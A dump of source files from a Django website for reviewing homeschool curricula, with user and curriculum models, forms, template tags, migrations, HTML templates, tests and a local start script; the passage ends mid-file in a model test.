"text": "from django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.urls import reverse\nfrom fphs.curriculums.models import Curriculum\n\n\nclass User(AbstractUser):\n name = models.CharField(blank=True, max_length=255)\n bio = models.TextField(blank=True, max_length=2000)\n location = models.CharField(blank=True, max_length=255)\n website = models.URLField(blank=True)\n facebook = models.URLField(blank=True)\n instagram = models.URLField(blank=True)\n twitter = models.URLField(blank=True)\n pintrest = models.URLField(blank=True)\n public_reviews = models.BooleanField(default=True)\n favorite_curriculums = models.ManyToManyField(\n Curriculum,\n blank=True,\n related_name=\"favorited_by\",\n through=\"FavoriteCurriculum\",\n )\n\n def get_absolute_url(self):\n return reverse(\"users:profile\", kwargs={\"username\": self.username})\n\n\nclass FavoriteCurriculum(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n curriculum = models.ForeignKey(Curriculum, on_delete=models.CASCADE)\n created = models.DateTimeField(auto_now_add=True)\n"
},
{
"alpha_fraction": 0.6960698962211609,
"alphanum_fraction": 0.7013100385665894,
"avg_line_length": 33.69696807861328,
"blob_id": "8454d335afacbc78303be9b6b6801d8b2b99c19e",
"content_id": "aefda478b9f93f8ae75dfd38f69a0efffa1aa330",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1145,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 33,
"path": "/fphs/curriculums/templatetags/curriculum_extras.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django import template\n\nregister = template.Library()\n\n\[email protected]_tag\ndef is_filtered(items, filterIds):\n return bool(set(map(lambda i: i.id, items)).intersection(filterIds))\n\n\[email protected]_tag(\"curriculums/favorite.html\", takes_context=True)\ndef favorite_link(context, curriculum):\n request = context[\"request\"]\n user = request.user\n if user.is_anonymous:\n return {\"curriculum\": curriculum, \"is_favorite\": False}\n is_favorite = True if curriculum in user.favorite_curriculums.all() else False\n return {\"request\": request, \"curriculum\": curriculum, \"is_favorite\": is_favorite}\n\n\[email protected]_tag(\"reviews/star.html\")\ndef star_rating(rating):\n stars = range(int(rating))\n half = range(1 if rating % 1 >= 0.5 else 0)\n empty = range(5 - len(stars) - len(half))\n return {\"stars\": stars, \"half\": half, \"empty\": empty}\n\n\[email protected]_tag(\"reviews/link.html\", takes_context=True)\ndef review_link(context, curriculum):\n user = context[\"request\"].user\n review = curriculum.reviews.filter(user__id=user.id).first() or None\n return {\"curriculum\": curriculum, \"review\": review}\n"
},
{
"alpha_fraction": 0.40175631642341614,
"alphanum_fraction": 0.41931942105293274,
"avg_line_length": 40.40909194946289,
"blob_id": "2592773fc57e8b2f6c7c6b06cad23564b7652435",
"content_id": "257c0b07f8270afa3e44b13ad18d10cebea58c64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 911,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 22,
"path": "/fphs/curriculums/templates/reviews/row.html",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "{% load curriculum_extras %}\n\n<div class=\"row my-3\">\n <div class=\"col-12\">\n <div class=\"card shadow-sm\">\n <div class=\"card-body\">\n <div class=\"row\">\n <div class=\"col-12 col-md-9 col-lg-10\">\n {% if detail %}<h5><a href=\"{% url 'curriculums:detail' detail.slug %}\">{{detail}}</a></h5>{% endif %}\n {% include 'reviews/text.html' with review=review %}\n </div>\n <div class=\"col-12 col-md-3 col-lg-2 d-flex flex-column\">\n <h5>Rating: {{review.rating}}</h5>\n {% star_rating review.rating %}\n {# TODO: Add review ranking based on feedback #}\n {# {% include 'reviews/helpful.html' %} #}\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n"
},
{
"alpha_fraction": 0.4399999976158142,
"alphanum_fraction": 0.4699999988079071,
"avg_line_length": 27.205127716064453,
"blob_id": "418cd184d364b65c3014361e68aad0c2170843a9",
"content_id": "3b471089bc82267d51ffd19c3df2cd50da962e82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1100,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 39,
"path": "/fphs/curriculums/migrations/0011_auto_20200529_0234.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-05-29 02:34\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0010_auto_20200529_0201\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"ReligiousPreference\",\n fields=[\n (\n \"id\",\n models.AutoField(\n auto_created=True,\n primary_key=True,\n serialize=False,\n verbose_name=\"ID\",\n ),\n ),\n (\"name\", models.CharField(max_length=30)),\n ],\n ),\n migrations.AlterField(\n model_name=\"curriculum\",\n name=\"religious_preference\",\n field=models.ForeignKey(\n null=True,\n on_delete=django.db.models.deletion.SET_NULL,\n related_name=\"curriculums\",\n to=\"curriculums.ReligiousPreference\",\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4766410291194916,
"alphanum_fraction": 0.5002956986427307,
"avg_line_length": 30.90566062927246,
"blob_id": "c3c2153c9daf905a34bc7fee2f186866623d0db6",
"content_id": "81acf0f7cf93a7733a2583b231d4208144538762",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1691,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 53,
"path": "/fphs/curriculums/templates/curriculums/detail.html",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n\n{% load wagtailimages_tags curriculum_extras %}\n\n{% block head_title %}Curriculum - {{ curriculum.name }}{% endblock %}\n\n{% block content %}\n <div class=\"row\">\n <div class=\"col-md-3\">\n {% if curriculum.image %}\n {% image curriculum.image fill-320x240 %}\n {% else %}\n <img class=\"img-fluid\" src=\"https://via.placeholder.com/320x240\" class=\"mr-3\" alt=\"{{ curriculum.name }}\">\n {% endif %}\n </div>\n <div class=\"col-md-6\">\n <h1>{{ curriculum.name }}</h1>\n <p>{{ curriculum.description }}</p>\n </div>\n <div class=\"col-md-3\">\n <h4>Rating: {{ avg_rating }}</h4>\n {% star_rating avg_rating %}\n <br/>\n {% review_link curriculum %}\n {% favorite_link curriculum %}\n </div>\n </div>\n\n <br/><br/>\n <h4>Publisher</h4>\n <p>{{ curriculum.publisher }}</p>\n\n {% include 'curriculums/group.html' with name=\"categories\" list=categories %}\n {% include 'curriculums/group.html' with name=\"subjects\" list=subjects %}\n\n <h3>Grades</h3>\n <p>{{ grades.0 }}{% if grades.1 %} - {{ grades.1 }}{% endif %}</p>\n\n <h3>Ages</h3>\n <p>{{ ages.0 }}{% if ages.1 %} - {{ ages.1 }}{% endif %}</p>\n\n <div class=\"row my-2\">\n <div class=\"col-12\">\n <h3>Latest Reviews</h3>\n <h5><a href=\"{% url 'curriculums:reviews:index' curriculum.slug %}\">View All</a></h6>\n </div>\n </div>\n <div class=\"row my-2\">\n {% for review in reviews %}\n {% include 'reviews/card.html' with review=review %}\n {% endfor %}\n </div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.7128713130950928,
"alphanum_fraction": 0.7326732873916626,
"avg_line_length": 17.363636016845703,
"blob_id": "3b41dd50f15d8f8b51d770252a8954f4b46cd3a0",
"content_id": "c43dc1cfb607f1eced83be6298d468717cf8f2b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 202,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 11,
"path": "/compose/local/django/start",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nset -o errexit\nset -o pipefail\nset -o nounset\n\necho 'Running migrations...'\npython manage.py migrate\n\necho 'Starting application...'\nuvicorn config.asgi:application --host 0.0.0.0 --reload\n"
},
{
"alpha_fraction": 0.676508367061615,
"alphanum_fraction": 0.6854942440986633,
"avg_line_length": 25.86206817626953,
"blob_id": "23e7c6b8f3806115c71fef57659147c72c5712ff",
"content_id": "5897f32bda42d78a1ed1771afe95c0deb35ea221",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 779,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 29,
"path": "/fphs/utils/models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nfrom wagtailmetadata.models import MetadataMixin\n\n\nclass Metadata(MetadataMixin):\n def __init__(self, request, title, description, image=None):\n self.request = request\n self.title = title\n self.description = description\n self.image = image\n\n def get_meta_url(self):\n return self.request.build_absolute_uri()\n\n def get_meta_title(self):\n return self.title\n\n def get_meta_description(self):\n return self.description\n\n def get_meta_image(self):\n return self.image\n\n\nclass Contact(models.Model):\n email = models.EmailField(blank=False, max_length=254, verbose_name=\"email address\")\n message = models.TextField(max_length=2000)\n replied = models.BooleanField(default=False)\n"
},
{
"alpha_fraction": 0.5767619013786316,
"alphanum_fraction": 0.5786666870117188,
"avg_line_length": 28.829545974731445,
"blob_id": "d8eb7bcd4cb76722993fa893d6624d33de323f21",
"content_id": "bd61485a1acf7f4e8b4d9dbeb3c91b9b4fe2d4e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2625,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 88,
"path": "/fphs/users/forms.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import HTML, Layout, Submit\nfrom django.contrib.auth import forms, get_user_model\nfrom django.core.exceptions import ValidationError\nfrom django.forms import ModelForm\nfrom django.utils.translation import ugettext_lazy as _\n\nFormHelper.use_custom_control = False\nUser = get_user_model()\n\n\nclass UserChangeForm(forms.UserChangeForm):\n class Meta(forms.UserChangeForm.Meta):\n model = User\n\n\nclass UserCreationForm(forms.UserCreationForm):\n\n error_message = forms.UserCreationForm.error_messages.update(\n {\"duplicate_username\": _(\"This username has already been taken.\")}\n )\n\n class Meta(forms.UserCreationForm.Meta):\n model = User\n\n def clean_username(self):\n username = self.cleaned_data[\"username\"]\n\n try:\n User.objects.get(username=username)\n except User.DoesNotExist:\n return username\n\n raise ValidationError(self.error_messages[\"duplicate_username\"])\n\n\nclass UserProfileForm(ModelForm):\n class Meta:\n model = User\n fields = [\n \"name\",\n \"bio\",\n \"location\",\n \"website\",\n \"facebook\",\n \"instagram\",\n \"twitter\",\n \"pintrest\",\n ]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n title = _(\"Profile\")\n self.helper = FormHelper()\n self.helper.layout = Layout(\n HTML(f\"<h1>{title}</h1>\"),\n \"name\",\n \"bio\",\n \"location\",\n \"website\",\n \"facebook\",\n \"instagram\",\n \"twitter\",\n \"pintrest\",\n Submit(\"submit\", _(\"Save\"), css_class=\"btn-secondary\"),\n )\n\n\nclass UserPrivacyForm(ModelForm):\n class Meta:\n model = User\n fields = [\"public_reviews\"]\n labels = {\"public_reviews\": _(\"Display reviews on public profile\")}\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n title = _(\"Privacy\")\n public_reviews_text = _(\n \"\"\"Enabling this setting allows reviews to be displayed as part of your profile. Removing\n reviews from your profile will not remove them from displaying on the curriculums themselves\"\"\"\n )\n self.helper = FormHelper()\n self.helper.layout = Layout(\n HTML(f\"<h1>{title}</h1>\"),\n \"public_reviews\",\n HTML(f'<div class=\"mb-4 text-muted\">{public_reviews_text}</div>'),\n Submit(\"submit\", _(\"Save\"), css_class=\"btn-secondary\"),\n )\n"
},
{
"alpha_fraction": 0.606656551361084,
"alphanum_fraction": 0.6626323461532593,
"avg_line_length": 26.54166603088379,
"blob_id": "5649700b1336a5d5716dd1a6a5df956dcaca3399",
"content_id": "547b81daef3fe0bef4e8a44142e4365f5165fb6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 661,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 24,
"path": "/fphs/curriculums/migrations/0005_auto_20200103_2354.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-01-03 23:54\n\nfrom django.db import migrations\n\n\ndef create_publishers(apps, schema_editor):\n Publisher = apps.get_model(\"curriculums\", \"Publisher\")\n Curriculum = apps.get_model(\"curriculums\", \"Curriculum\")\n\n for curriculum in Curriculum.objects.all():\n instance, _ = Publisher.objects.get_or_create(\n name=\"Default\", link=\"http://127.0.0.1\"\n )\n curriculum.publisher = instance\n curriculum.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0004_auto_20200103_2349\"),\n ]\n\n operations = [migrations.RunPython(create_publishers)]\n"
},
{
"alpha_fraction": 0.5071089863777161,
"alphanum_fraction": 0.5805687308311462,
"avg_line_length": 21.210525512695312,
"blob_id": "69ecf60d29124a7e81959b05710bf62a40da0ae1",
"content_id": "61e13f6100ad5790ab9309605f35b8f12c6e3a17",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 19,
"path": "/fphs/curriculums/migrations/0003_curriculum_link.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2019-12-28 00:52\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0002_auto_20191225_0321\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"link\",\n field=models.URLField(default=\"\"),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5521191358566284,
"alphanum_fraction": 0.5876288414001465,
"avg_line_length": 28.100000381469727,
"blob_id": "e58f0599c489332a8acba5bea74c34f1795f5da3",
"content_id": "302824784d462440e47ae8d6803083fa9d1f3dc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 873,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 30,
"path": "/fphs/curriculums/migrations/0008_auto_20200315_1541.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-03-15 15:41\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n (\"curriculums\", \"0007_auto_20200104_0331\"),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name=\"category\",\n options={\"verbose_name\": \"Category\", \"verbose_name_plural\": \"Categories\"},\n ),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"created_by\",\n field=models.ForeignKey(\n null=True,\n on_delete=django.db.models.deletion.SET_NULL,\n related_name=\"curriculums\",\n to=settings.AUTH_USER_MODEL,\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5375000238418579,
"alphanum_fraction": 0.550000011920929,
"avg_line_length": 31,
"blob_id": "c0f145845adcdc4ccd96cd325af3cbc4cc07ee5d",
"content_id": "2a36acec1e0a9ca85dea7ba31472cf0ae6f40e2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 160,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 5,
"path": "/fphs/curriculums/templates/curriculums/group.html",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "{# {% include 'curriculums/group.html' with name=\"\" list= %} #}\n<h3>{{ name.capitalize }}</h3>\n{% for item in list %}\n <li>{{ item.name }}</li>\n{% endfor %}\n"
},
{
"alpha_fraction": 0.48496994376182556,
"alphanum_fraction": 0.5170340538024902,
"avg_line_length": 27.514286041259766,
"blob_id": "c0f088b08e51a287450e198c78df616a2a33bf4a",
"content_id": "80219afe9dd52df675af37291caa91075bbc2b41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 998,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 35,
"path": "/fphs/curriculums/migrations/0007_auto_20200104_0331.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-01-04 03:31\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0006_auto_20200104_0004\"),\n ]\n\n operations = [\n migrations.RemoveField(model_name=\"curriculum\", name=\"categories\",),\n migrations.AddField(\n model_name=\"curriculum\",\n name=\"format\",\n field=models.CharField(\n choices=[(\"R\", \"Resource\"), (\"T\", \"Textbook\"), (\"W\", \"Workbook\")],\n max_length=1,\n null=True,\n ),\n ),\n migrations.AddField(\n model_name=\"subject\",\n name=\"category\",\n field=models.ForeignKey(\n blank=True,\n null=True,\n on_delete=django.db.models.deletion.SET_NULL,\n related_name=\"subjects\",\n to=\"curriculums.Category\",\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6507518887519836,
"alphanum_fraction": 0.6612781882286072,
"avg_line_length": 40.5625,
"blob_id": "3a8bf9285e14caec11e8f170db0c2989ea3623b5",
"content_id": "08cb6c8add073ea147e4d57932a79dd7984178cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2660,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 64,
"path": "/fphs/curriculums/tests/test_views.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.test import TestCase\nfrom django.urls import reverse\n\nfrom .test_utils import create_curriculum\nfrom fphs.curriculums.urls import app_name\nfrom fphs.curriculums.models import Curriculum, Sort\n\n\nclass CurriculumIndexViewTest(TestCase):\n @classmethod\n def setUpTestData(cls):\n for i in range(5):\n create_curriculum(i + 1)\n\n def test_view_curriculums_url_settings_and_template(self):\n response = self.client.get(f\"/{app_name}/\")\n self.assertEqual(response.status_code, 200)\n\n response = self.client.get(reverse(f\"{app_name}:index\"))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, f\"{app_name}/index.html\")\n\n def test_view_curriculums_lists_all(self):\n response = self.client.get(f\"/{app_name}/\")\n curriculums = Curriculum.objects.all()\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[app_name]), 5)\n self.assertEqual(\n list(response.context[app_name]),\n list(curriculums.order_by(Sort.Values.NEWEST.label)),\n )\n\n def test_view_curriculums_lists_filter_categories(self):\n curriculum = Curriculum.objects.get(name=1)\n category = curriculum.subjects.all().first().category.id\n response = self.client.get(f\"/{app_name}/?category={category}\")\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[app_name]), 1)\n self.assertEqual(list(response.context[app_name]), [curriculum])\n\n def test_view_curriculums_lists_filter_multiple_params(self):\n curriculum = Curriculum.objects.get(name=1)\n grade = curriculum.grades.all().first().id\n age = curriculum.ages.all().first().id\n response = self.client.get(f\"/{app_name}/?grade={grade}&age={age}\")\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[app_name]), 1)\n self.assertEqual(list(response.context[app_name]), [curriculum])\n\n def test_view_curriculums_lists_filter_multiple_values(self):\n curriculums = Curriculum.objects.all().order_by(\"id\")\n grades = list(map(lambda x: x.grades.all().first().id, curriculums))[:4]\n query_string = \"?\" + \"&\".join(list(map(lambda x: f\"grade={x}\", grades)))\n response = self.client.get(f\"/{app_name}/{query_string}\")\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.context[app_name]), 4)\n self.assertEqual(\n list(response.context[app_name]),\n list(curriculums.order_by(Sort.Values.NEWEST.label))[1:],\n )\n"
},
{
"alpha_fraction": 0.6659574508666992,
"alphanum_fraction": 0.6712765693664551,
"avg_line_length": 36.599998474121094,
"blob_id": "0c4110e214370976f8b2f506be4ddf6f5cd321f6",
"content_id": "9a1aac2c44604d7f966b0ecda1470163d928a9e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 940,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 25,
"path": "/fphs/utils/forms.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from captcha.fields import ReCaptchaField\nfrom captcha.widgets import ReCaptchaV3\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Submit\nfrom django.forms import CharField, EmailInput, Form, Textarea\nfrom django.utils.translation import ugettext_lazy as _\n\nFormHelper.use_custom_control = False\n\n\nclass ContactForm(Form):\n email = CharField(widget=EmailInput(attrs={\"placeholder\": \"Email\"}))\n message = CharField(widget=Textarea(attrs={\"placeholder\": \"Message\"}))\n captcha = ReCaptchaField(widget=ReCaptchaV3(attrs={\"required_score\": 0.85}))\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n \"email\",\n \"message\",\n \"captcha\",\n Submit(\"submit\", _(\"Send Message\"), css_class=\"btn-secondary\"),\n )\n self.fields[\"captcha\"].label = False\n"
},
{
"alpha_fraction": 0.4997195601463318,
"alphanum_fraction": 0.5176668763160706,
"avg_line_length": 27.30158805847168,
"blob_id": "692952a2e348af285bf6ad58a6e445cc763d8263",
"content_id": "d55cd644969f2aec7273eb39ff1fc642971f086b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1783,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 63,
"path": "/fphs/users/migrations/0004_auto_20200728_2034.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-28 20:34\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0003_user_favorite_curriculums'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='bio',\n field=models.TextField(blank=True, max_length=2000),\n ),\n migrations.AddField(\n model_name='user',\n name='facebook',\n field=models.URLField(blank=True),\n ),\n migrations.AddField(\n model_name='user',\n name='instagram',\n field=models.URLField(blank=True),\n ),\n migrations.AddField(\n model_name='user',\n name='location',\n field=models.CharField(blank=True, max_length=255),\n ),\n migrations.AddField(\n model_name='user',\n name='occupation',\n field=models.CharField(blank=True, max_length=255),\n ),\n migrations.AddField(\n model_name='user',\n name='pintrest',\n field=models.URLField(blank=True),\n ),\n migrations.AddField(\n model_name='user',\n name='public_reviews',\n field=models.BooleanField(default=True),\n ),\n migrations.AddField(\n model_name='user',\n name='twitter',\n field=models.URLField(blank=True),\n ),\n migrations.AddField(\n model_name='user',\n name='website',\n field=models.URLField(blank=True),\n ),\n migrations.AlterField(\n model_name='user',\n name='name',\n field=models.CharField(blank=True, max_length=255),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5894854664802551,
"alphanum_fraction": 0.6286353468894958,
"avg_line_length": 34.7599983215332,
"blob_id": "aa820f24b2d9cc7c7ad33f11ed7e5adcd663f42e",
"content_id": "b3ad4fc9279a556d4f6d3e34c62ae7dc335fa650",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 25,
"path": "/fphs/users/migrations/0005_favoritecurriculum.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-30 22:48\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('curriculums', '0012_curriculum_image'),\n ('users', '0004_auto_20200728_2034'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FavoriteCurriculum',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('curriculum', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='curriculums.Curriculum')),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n"
},
{
"alpha_fraction": 0.6808769702911377,
"alphanum_fraction": 0.6808769702911377,
"avg_line_length": 20.605262756347656,
"blob_id": "9b92daa8566a30a7e76dde8998f3887e84022611",
"content_id": "fa55b1de279555d80fa3eb9f7b72e7f6ed411ac5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 821,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 38,
"path": "/fphs/home/models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nfrom wagtail.admin.edit_handlers import FieldPanel\nfrom wagtail.core.models import Page\nfrom wagtail.core.fields import RichTextField\n\n\nclass HomePage(Page):\n body = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel(\"body\", classname=\"full\"),\n ]\n\n\nclass AboutPage(Page):\n body = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel(\"body\", classname=\"full\"),\n ]\n\n\nclass PrivacyPolicyPage(Page):\n\n body = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel(\"body\", classname=\"full\"),\n ]\n\n\nclass TermsOfServicePage(Page):\n body = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [\n FieldPanel(\"body\", classname=\"full\"),\n ]\n"
},
{
"alpha_fraction": 0.7030237317085266,
"alphanum_fraction": 0.7030237317085266,
"avg_line_length": 24.027027130126953,
"blob_id": "4c794e65fc797793a185ab5e48a4cbc0a58aab22",
"content_id": "c8eb5e910c187d87e38c756c5eea169a790aaa2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 926,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 37,
"path": "/fphs/curriculums/admin.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom .models import (\n Curriculum,\n Category,\n Subject,\n Grade,\n Age,\n ReligiousPreference,\n Publisher,\n)\n\n\nclass CurriculumAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"name\", \"description\", \"link\", \"is_confirmed\")\n list_display_links = (\"name\",)\n list_filter = (\"is_confirmed\", \"subjects__category\", \"subjects\", \"grades\", \"ages\")\n\n\nclass PublisherAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"name\", \"link\")\n list_display_links = (\"name\",)\n\n\nclass SubjectAdmin(admin.ModelAdmin):\n list_display = (\"name\", \"category\")\n list_display_links = (\"name\",)\n\n\n# Register your models here.\nadmin.site.register(Curriculum, CurriculumAdmin)\nadmin.site.register(Publisher, PublisherAdmin)\nadmin.site.register(Subject, SubjectAdmin)\nadmin.site.register(Category)\nadmin.site.register(Grade)\nadmin.site.register(Age)\nadmin.site.register(ReligiousPreference)\n"
},
{
"alpha_fraction": 0.6783581972122192,
"alphanum_fraction": 0.6794776320457458,
"avg_line_length": 35.216217041015625,
"blob_id": "9d14ce8b327176cb5d0f46ffe8792f99222e7fa2",
"content_id": "813d11cd8a190faa99107432cb16302738bdd50b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2680,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 74,
"path": "/fphs/curriculums/tests/test_models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom .test_utils import create_curriculum\nfrom fphs.curriculums.models import (\n Category,\n Subject,\n Grade,\n Age,\n ReligiousPreference,\n Publisher,\n Curriculum,\n Review,\n)\n\n\nclass CurriculumModelsTest(TestCase):\n ID = 1\n\n @classmethod\n def setUpTestData(cls):\n create_curriculum(CurriculumModelsTest.ID)\n\n def test_model_category(self):\n category = Category.objects.get(name=CurriculumModelsTest.ID)\n\n self.assertIsInstance(category, Category)\n self.assertEquals(category._meta.verbose_name, \"Category\")\n self.assertEquals(category._meta.verbose_name_plural, \"Categories\")\n\n def test_model_subject(self):\n category = Category.objects.get(name=CurriculumModelsTest.ID)\n subject = Subject.objects.get(name=CurriculumModelsTest.ID)\n\n self.assertIsInstance(subject, Subject)\n self.assertEquals(subject.category, category)\n\n def test_model_curriculum(self):\n curriculum = Curriculum.objects.get(name=CurriculumModelsTest.ID)\n subject = Subject.objects.get(name=CurriculumModelsTest.ID)\n grade = Grade.objects.get(name=CurriculumModelsTest.ID)\n age = Age.objects.get(name=CurriculumModelsTest.ID)\n religious_preference = ReligiousPreference.objects.get(\n name=CurriculumModelsTest.ID\n )\n publisher = Publisher.objects.get(name=CurriculumModelsTest.ID)\n user = get_user_model().objects.get(\n username=f\"username{CurriculumModelsTest.ID}\"\n )\n\n self.assertIsInstance(curriculum, Curriculum)\n self.assertEquals(curriculum.is_confirmed, False)\n self.assertEquals(list(curriculum.subjects.all()), [subject])\n self.assertEquals(list(curriculum.grades.all()), [grade])\n self.assertEquals(list(curriculum.ages.all()), [age])\n self.assertEquals(curriculum.religious_preference, religious_preference)\n self.assertEquals(curriculum.publisher, publisher)\n self.assertEquals(curriculum.created_by, user)\n\n def test_model_review(self):\n name = \"Test2\"\n curriculum = Curriculum.objects.get(name=CurriculumModelsTest.ID)\n user = get_user_model().objects.create_user(\n email=\"[email 